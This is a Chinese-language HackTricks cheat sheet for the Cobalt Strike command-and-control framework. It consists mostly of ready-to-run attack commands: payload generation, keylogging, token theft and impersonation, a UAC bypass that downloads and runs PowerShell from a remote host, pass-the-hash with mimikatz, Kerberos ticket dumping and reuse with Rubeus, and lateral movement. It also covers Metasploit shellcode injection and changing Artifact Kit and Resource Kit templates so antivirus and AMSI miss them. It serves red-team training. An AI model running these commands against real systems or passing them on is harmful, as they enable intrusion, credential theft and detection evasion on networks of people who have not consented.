hacktricks/c2/cobalt-strike.md
2023-08-03 19:12:22 +00:00

10 KiB
Raw Blame History

Cobalt Strike

监听器

C2监听器

Cobalt Strike -> 监听器 -> 添加/编辑然后您可以选择监听的位置使用哪种beaconhttpdnssmb...)等等。

Peer2Peer监听器

这些监听器的beacon不需要直接与C2通信它们可以通过其他beacon与其通信。

Cobalt Strike -> 监听器 -> 添加/编辑然后您需要选择TCP或SMB beacon。

  • TCP beacon将在所选端口设置监听器。要连接到TCP beacon请使用另一个beacon中的命令connect <ip> <port>
  • smb beacon将在具有所选名称的pipename上进行监听。要连接到SMB beacon您需要使用命令link [target] [pipe]

生成和托管payloads

在文件中生成payloads

攻击 -> 包 ->

  • HTMLApplication 用于HTA文件
  • MS Office Macro 用于带有宏的办公文档
  • Windows Executable 用于.exe.dll或服务.exe
  • Windows Executable (S) 用于无阶段的.exe.dll或服务.exe无阶段比有阶段更好IoC更少

生成和托管payloads

攻击 -> Web Drive-by -> Scripted Web Delivery (S) 这将生成一个脚本/可执行文件用于从cobalt strike下载beacon格式可以是bitsadminexepowershell和python

托管Payloads

如果您已经有要托管在Web服务器上的文件只需转到攻击 -> Web Drive-by -> Host File然后选择要托管的文件和Web服务器配置。

Beacon选项

# 执行本地.NET二进制文件
execute-assembly </path/to/executable.exe>

# 截屏
printscreen    # 通过PrintScr方法拍摄单个截屏
screenshot     # 拍摄单个截屏
screenwatch    # 定期拍摄桌面截屏
## 转到View -> Screenshots查看它们

# 键盘记录器
keylogger [pid] [x86|x64]
## 查看 > Keystrokes以查看按下的键

# 端口扫描
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # 在另一个进程中注入端口扫描操作
portscan [targets] [ports] [arp|icmp|none] [max connections]

# Powershell
# 导入Powershell模块
powershell-import C:\path\to\PowerView.ps1
powershell <在此处编写Powershell命令>

# 用户模拟
## 使用凭据生成令牌
make_token [DOMAIN\user] [password] #创建用于模拟网络中的用户的令牌
ls \\computer_name\c$ #尝试使用生成的令牌访问计算机中的C$
rev2self #停止使用通过make_token生成的令牌
## 使用make_token会生成事件4624成功登录了一个帐户。这个事件在Windows域中非常常见但可以通过过滤登录类型来缩小范围。如上所述它使用LOGON32_LOGON_NEW_CREDENTIALS这是类型9。

# UAC绕过
elevate svc-exe <listener>
elevate uac-token-duplication <listener>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

## 从pid中窃取令牌
## 类似于make_token但是从进程中窃取令牌
steal_token [pid] #此外,这对于网络操作非常有用,而不是本地操作
## 从API文档中我们知道这个登录类型“允许调用者克隆其当前令牌”。这就是为什么Beacon输出显示Impersonated <current_username> - 它正在模拟我们自己的克隆令牌。
ls \\computer_name\c$ #尝试使用生成的令牌访问计算机中的C$
rev2self #停止使用从steal_token窃取的令牌

## 以新凭据启动进程
spawnas [domain\username] [password] [listener] #从具有读取访问权限的目录cd C:\)中执行此操作
## 类似于make_token这将生成Windows事件4624成功登录了一个帐户但登录类型为2LOGON32_LOGON_INTERACTIVE。它将详细说明调用用户TargetUserName和模拟用户TargetOutboundUserName。

## 注入进程
inject [pid] [x64|x86] [listener]
## 从OpSec的角度来看除非确实有必要例如x86 -> x64或x64 -> x86否则不要执行跨平台注入。

## 传递哈希
## 此修改过程需要对LSASS内存进行修补这是一项高风险操作需要本地管理员权限并且如果启用了受保护的进程轻量级PPL则不太可行。
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]

## 通过mimikatz传递哈希
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
## 没有/runmimikatz会生成一个cmd.exe如果您以桌面用户身份运行他将看到shell如果您以SYSTEM身份运行则可以正常运行
steal_token <pid> #从mimikatz创建的进程中窃取令牌

## 传递票据
## 请求一个票据
execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
## 创建一个新的登录会话以使用新的票据(以不覆盖受损的票据)
make_token <domain>\<username> DummyPass
## 将票据写入攻击者机器的powershell会话中并加载它
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
## 从SYSTEM传递票据
## 使用票据生成新进程
execute-assembly C:\path\Rubeus.exe asktgt /user:<用户名> /domain:<域名> /aes256:<AES密钥> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## 从该进程中窃取令牌
steal_token <pid>

## 提取票据 + 传递票据
### 列出票据
execute-assembly C:\path\Rubeus.exe triage
### 通过luid转储有趣的票据
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
### 创建新的登录会话注意luid和进程ID
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### 在生成的登录会话中插入票据
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### 最后,从该新进程中窃取令牌
steal_token <pid>

# 横向移动
## 如果创建了令牌,将使用它
jump [方法] [目标] [监听器]
## 方法:
## psexec                    x86   使用服务运行服务EXE文件
## psexec64                  x64   使用服务运行服务EXE文件
## psexec_psh                x86   使用服务运行PowerShell一行命令
## winrm                     x86   通过WinRM运行PowerShell脚本
## winrm64                   x64   通过WinRM运行PowerShell脚本

remote-exec [方法] [目标] [命令]
## 方法:
## psexec                          通过服务控制管理器远程执行
## winrm                           通过WinRM远程执行PowerShell
## wmi                             通过WMI远程执行

## 要使用wmi执行beacon不在jump命令中只需上传beacon并执行它
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe


# 将会话传递给Metasploit - 通过监听器
## 在Metasploit主机上
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j

## 在cobalt中Listeners > Add并将Payload设置为Foreign HTTP。将Host设置为10.10.5.120将Port设置为8080然后点击Save。
beacon> spawn metasploit
## 只能使用外部监听器生成x86 Meterpreter会话。

# 将会话传递给Metasploit - 通过shellcode注入
## 在Metasploit主机上
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
## 运行msfvenom并准备multi/handler监听器

## 将bin文件复制到cobalt strike主机
ps
shinject <pid> x64 C:\Payloads\msf.bin #在x64进程中注入metasploit shellcode

# 将metasploit会话传递给cobalt strike
## 生成无阶段的Beacon shellcode转到Attacks > Packages > Windows Executable (S)选择所需的监听器将Output type设置为Raw选择Use x64 payload。
## 在metasploit中使用post/windows/manage/shellcode_inject将生成的cobalt strike shellcode注入

# 枢纽
## 在teamserver中打开socks代理
beacon> socks 1080

# SSH连接
beacon> ssh 10.10.17.12:22 用户名 密码

避免杀毒软件

Artifact Kit

通常在/opt/cobaltstrike/artifact-kit您可以找到cobalt strike将用于生成二进制beacon的代码和预编译模板/src-common中)。

使用ThreatCheck与生成的后门(或仅与编译的模板)一起,您可以找到是什么触发了防御者。通常是一个字符串。因此,您只需修改生成后门的代码,使该字符串不出现在最终的二进制文件中。

修改代码后,只需从同一目录运行./build.sh,然后将dist-pipe/文件夹复制到Windows客户端的C:\Tools\cobaltstrike\ArtifactKit中。

pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .

不要忘记加载dist-pipe\artifact.cna这个侵略性脚本以指示Cobalt Strike使用我们想要的磁盘资源而不是加载的资源。

资源工具包

资源工具包文件夹包含了Cobalt Strike基于脚本的载荷的模板包括PowerShell、VBA和HTA。

使用ThreatCheck和这些模板您可以找出防御者在这种情况下是AMSI不喜欢的内容并进行修改

.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1

修改检测到的行,可以生成一个不会被捕捉的模板。

不要忘记加载侵略性脚本 ResourceKit\resources.cna以指示Cobalt Strike使用我们想要的磁盘资源而不是加载的资源。

cd C:\Tools\neo4j\bin
neo4j.bat console
http://localhost:7474/ --> Change password
execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL



# Change powershell
C:\Tools\cobaltstrike\ResourceKit
template.x64.ps1
# Change $var_code -> $polop
# $x --> $ar
cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna

#artifact kit
cd  C:\Tools\cobaltstrike\ArtifactKit
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .